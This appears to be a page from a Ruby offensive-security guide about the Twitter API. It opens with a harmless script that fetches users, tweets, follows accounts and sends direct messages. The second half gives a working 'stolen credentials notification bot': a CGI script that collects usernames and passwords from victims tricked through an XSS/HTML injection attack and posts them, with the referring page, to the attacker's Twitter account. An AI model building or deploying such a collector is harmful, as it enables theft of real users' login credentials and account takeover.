Dealing with Twitter's API is really useful for information gathering, taxonomy and social engineering. However, you have to have some keys and tokens in-order to interact with Twitter's APIs. To do so, please refer to the official Twitter development page.
Install Twitter API gem
gem install twitter
Basic Usage
rubyfu-tweet.rb
#!/usr/bin/env ruby# KING SABRI | @KINGSABRI#require'twitter'require'pp'client =Twitter::REST::Client.newdo|config| config.consumer_key ="YOUR_CONSUMER_KEY" config.consumer_secret ="YOUR_CONSUMER_SECRET" config.access_token ="YOUR_ACCESS_TOKEN" config.access_token_secret ="YOUR_ACCESS_SECRET"endputs client.user("Rubyfu") # Fetch a userputs client.update("@Rubyfu w00t! #Rubyfu") # Tweet (as the authenticated user)puts client.follow("Rubyfu") # Follow User (as the authenticated user)puts client.followers("Rubyfu") # Fetch followers of a userputs client.followers # Fetch followers of current userputs client.status(649235138585366528) # Fetch a particular Tweet by IDputs client.create_direct_message("Rubyfu","Hi, I'm KINGSABRI") # Send direct message to a particular user
Your turn, tweet to @Rubyfu using above example. Tweet your code and output to @Rubyfu.
Building Stolen Credentials notification bot
We're exploiting an XSS/HTML injection vulnerability and tricking users to enter there Username and Password. The idea is, We'll make a CGI script that takes that stolen credentials then tweet these credentials to us as notification or log system
#!/usr/bin/ruby -wrequire'cgi'require'uri'require'twitter'cgi =CGI.newputs cgi.headeruser =CGI.escape cgi['user']pass =CGI.escape cgi['pass']time =Time.now.strftime("%D %T")client =Twitter::REST::Client.newdo|config| config.consumer_key ="YOUR_CONSUMER_KEY" config.consumer_secret ="YOUR_CONSUMER_SECRET" config.access_token ="YOUR_ACCESS_TOKEN" config.access_token_secret ="YOUR_ACCESS_SECRET"endclient.user("KINGSABRI")if cgi.referer.nil? or cgi.referer.empty?# Twitter notification | WARNING! It's tweets, make sure your account is protected!!! client.update("[Info] No Referer!\n"+"#{CGI.unescape user}:#{CGI.unescape pass}")else client.update("[Info] #{cgi.referer}\n #{CGI.unescape user}:#{CGI.unescape pass}")endputs""